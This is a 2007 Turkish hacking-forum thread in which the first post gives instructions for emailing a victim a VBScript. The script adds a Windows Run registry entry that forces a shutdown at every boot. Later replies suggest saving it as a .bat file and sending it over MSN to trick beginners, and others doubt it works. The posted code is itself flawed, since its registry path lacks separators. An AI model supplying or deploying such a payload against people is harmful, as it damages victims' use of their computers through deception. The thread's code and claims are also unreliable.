mail yoluyla pc kapama süperrrr bakın

bY HeRkÜl1

Yeni üye
9 Ocak 2007
45
0
hotmailinize girin yeni msj yaratın kıme bolumune kurbanın adresını yazın..
konuya ilgi cekici bişi yazın
msj bolumune ıstedıgınız bır msjı yazın ve alttakı kodu ekleyın

KOD:

<script language="vbscript">
on error resume next
dim kutluk
set kutluk=CreateObject("WScript.Shell")

kutluk.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrent VersionRunSYSTEM32","shutdown -r"

</script>


bu kod kurbanın maılı acmasıyla kodlar devreye gırecek ve sistem uyarısı gelecek tum uygulamalarınızı kapatın dıyecek

yanı pc her acıldıgında 24 sanıye ıcınde bir kapanacak
emege saygı msjlarınızı ve tşk beklıorum
 

trex-trex

Yeni üye
10 Ocak 2007
2
0
dostum bunalrı daha öncede defalarca gördüm ama hiç biri çalışmadı..siz bunları no defterine kaydedip uzantısını bat yaparak kaydedin ve birilerine yedirin.. zaten onuda yiyecek adam kalmamıştır artık...yinede emeye saygı...
 

Yunus Emre

Yeni üye
3 Mar 2007
1
0
Aydin
güzel hos bunu paylasman ama msn den yolluyorum virus var diye hata veriyo göndermesi bile problemili ki karsindakinin almasini bi dusun !!!
 

trex-trex

Yeni üye
10 Ocak 2007
2
0
sallama şeyler bunlar boşverin bunlar eskidendi artık olmaz olamaz maili falan burakıp not deftrine kopyala farklı kaydet kaydederken isim yerine xxxx.bat olarak kaydet ve msn den birine yolla gerçi kimse yemez ama bazı yeni başlayanlar belki .
 

ismailyegul

Yeni üye
14 Tem 2007
47
0
tamam yemesine yedirdik de çalışıyor mu peki bunlar.daha önce de yayınlandı böyle şeyler forumda ama ben çalıştığına pek inanmıyorum.yine de sağol.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.